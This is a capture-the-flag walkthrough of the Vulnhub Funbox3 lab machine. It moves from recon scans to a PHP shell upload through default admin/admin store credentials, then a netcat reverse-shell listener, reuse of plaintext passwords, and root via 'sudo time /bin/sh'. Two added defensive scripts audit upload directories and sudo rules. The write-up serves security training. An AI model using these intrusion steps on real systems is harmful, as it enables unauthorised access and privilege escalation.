Vulnhub Funbox3: Detailed Walkthrough
Funbox3
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.162 08:00:27:41:c1:af 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.162.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 02:15 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:41:C1:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
Get Access
Browsing to port 80 from Kali Linux returns the Apache default page.
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:20:31 Starting gobuster in directory enumeration mode
===============================================================
/store (Status: 301) [Size: 316] [--> http://192.168.56.162/store/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.162/admin/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.162/secret/]
/gym (Status: 301) [Size: 314] [--> http://192.168.56.162/gym/]
/server-status (Status: 403) [Size: 279]
Progress: 219643 / 220561 (99.58%)
===============================================================
2022/11/08 02:21:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162/gym -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162/gym
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:21:49 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/img/]
/profile (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/profile/]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.162/gym/admin/]
/upload (Status: 301) [Size: 321] [--> http://192.168.56.162/gym/upload/]
/include (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/include/]
/LICENSE (Status: 200) [Size: 18025]
/att (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/att/]
/ex (Status: 301) [Size: 317] [--> http://192.168.56.162/gym/ex/]
/boot (Status: 301) [Size: 319] [--> http://192.168.56.162/gym/boot/]
Progress: 219077 / 220561 (99.33%)
===============================================================
2022/11/08 02:22:20 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 02:28:34 2022
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.162/secret/
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.162/store/
---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.56.162/store/controllers/
==> DIRECTORY: http://192.168.56.162/store/database/
==> DIRECTORY: http://192.168.56.162/store/functions/
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.56.162/store/models/
==> DIRECTORY: http://192.168.56.162/store/template/
---- Entering directory: http://192.168.56.162/admin/assets/ ----
-----------------
END_TIME: Tue Nov 8 02:28:41 2022
DOWNLOADED: 18448 - FOUND: 9
The scans turn up a large number of directories; among them, /store/database holds a username and password.
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
Log in to /store/admin with the username and password found here: admin / admin.
After logging in successfully, click "add new book".
Can't add new data Incorrect integer value: '' for column 'publisherid' at row 1
Note the publisher field here: the value can be copied from an existing Publisher.
shell.php can then be uploaded successfully.
Where does shell.php end up? Pick any book and locate its cover image; shell.php is visible in the same directory:
http://192.168.56.162/store/bootstrap/img/
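The upload above landed a .php file in a directory meant for book cover images. As an added defender-side example (not code from this writeup or from the store application), this Python script scans such an image directory and flags files by extension, by missing image signature and by embedded script tags, so both a plainly named shell.php and a script hiding behind a .jpg extension are reported; the fixture directory it builds is constructed for the demonstration.

```python
import os
import tempfile

# Signatures a book-cover upload should legitimately start with.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def inspect_file(path):
    """Return the reasons a file in an image-only directory looks wrong ([] if clean)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if ext not in IMAGE_EXTS:
        reasons.append("non-image extension " + (ext or "(none)"))
    if not head.startswith(IMAGE_MAGIC):
        reasons.append("content does not start with a known image signature")
    if any(marker in head for marker in SCRIPT_MARKERS):
        reasons.append("server-side script tag inside the file")
    return reasons


def scan_image_dir(root):
    """Walk an upload directory; return [(relative path, reasons)] for suspect files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            reasons = inspect_file(full)
            if reasons:
                findings.append((os.path.relpath(full, root), reasons))
    return findings


def build_sample_dir():
    """Constructed fixture: two genuine covers, one dropped .php file, and a
    .jpg whose body is really a script (the disguised-upload case)."""
    root = tempfile.mkdtemp(prefix="store_img_")
    samples = {
        "book1.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 64,
        "book2.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
        "shell.php": b"<?php /* constructed marker, not a working payload */ ?>",
        "cover.jpg": b"<?php /* script hiding behind an image extension */ ?>",
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root
```

Run the scanner from a cron job or a post-upload hook over the real image directory; anything it reports should never have been accepted by the upload handler in the first place.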
A shell is obtained:
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.162] 42364
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:39:53 up 30 min, 0 users, load average: 0.00, 0.04, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
cd /home
www-data@funbox3:/home$ ls -lah
ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Jul 30 2020 .
drwxr-xr-x 20 root root 4.0K Jul 30 2020 ..
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 .
drwxr-xr-x 3 root root 4.0K Jul 30 2020 ..
-rw------- 1 tony tony 30 Jul 31 2020 .bash_history
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25 2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30 2020 .cache
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-r--r-- 1 tony tony 0 Jul 30 2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31 2020 .viminfo
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
www-data@funbox3:/home/tony$ cat passwod.txt
cat passwod.txt
cat: passwod.txt: No such file or directory
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ su - tony
su - tony
Password: yxcvbnmYYY
tony@funbox3:~$ id
id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$ sudo -l
sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD:
/root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$
The hint is obvious: password.txt holds tony's password, which is what allowed the switch to the user tony.
Privilege escalation
tony@funbox3:~$ ls /root/root.txt
ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
tony@funbox3:~$ sudo /usr/bin/time /bin/sh
sudo /usr/bin/time /bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.flag snap
# cat root.flag
cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
#
Privilege escalation is straightforward: after consulting the GTFOBins site, the time command was chosen for the escalation.
The root flag is obtained!!!
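From the defender's side, the sudo -l listing above is the artifact to audit. The following Python script is an added example, not part of the original writeup: it parses sudo -l output (a constructed sample modelled on tony's, including the rule whose path wraps onto a second line) and flags NOPASSWD rules, rules whose target binary exists to run another command, as time does, and rules pointing at hidden or non-standard paths. The COMMAND_RUNNERS set is an illustrative assumption.

```python
import re

# Constructed sample (not captured from the box), shaped like the `sudo -l`
# output for tony above; a plain rule without a tag is added for contrast.
SAMPLE_SUDO_L = """\
User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD:
        /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
    (root) /usr/bin/id
"""

# Binaries whose documented job is to run a caller-supplied command; under a NOPASSWD
# root rule that command runs as root, which is what `sudo /usr/bin/time /bin/sh` above
# relied on. Illustrative set (assumption); extend it from the GTFOBins sudo list.
COMMAND_RUNNERS = {"time", "pkexec", "env", "nice", "nohup", "timeout"}
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.*)$")


def parse_sudo_l(text):
    """Return (runas, tags, command) triples from `sudo -l` output."""
    entries, pending = [], None
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            pending = (m.group("runas"), m.group("tags"), m.group("cmd").strip())
        elif pending and line.strip():  # sudo wrapped the command onto its own line
            pending = (pending[0], pending[1], line.strip())
        if pending and pending[2]:
            entries.append(pending)
            pending = None
    return entries


def audit_sudo_l(text):
    """Return [(command, [reasons])] for rules that deserve a reviewer's eye."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        name = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if "NOPASSWD" in tags:
            reasons.append("NOPASSWD: no re-authentication before running as " + runas)
        if name in COMMAND_RUNNERS:
            reasons.append(name + " hands control to whatever command the caller names")
        if name.startswith(".") or cmd.startswith("/root/"):
            reasons.append("hidden or non-standard target path; review the script itself")
        if reasons:
            findings.append((cmd, reasons))
    return findings
```

Feeding it the real output of `sudo -l -U <user>` for each account on a host gives a quick list of rules to justify or remove.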
STRIVE FOR PROGRESS, NOT FOR PERFECTION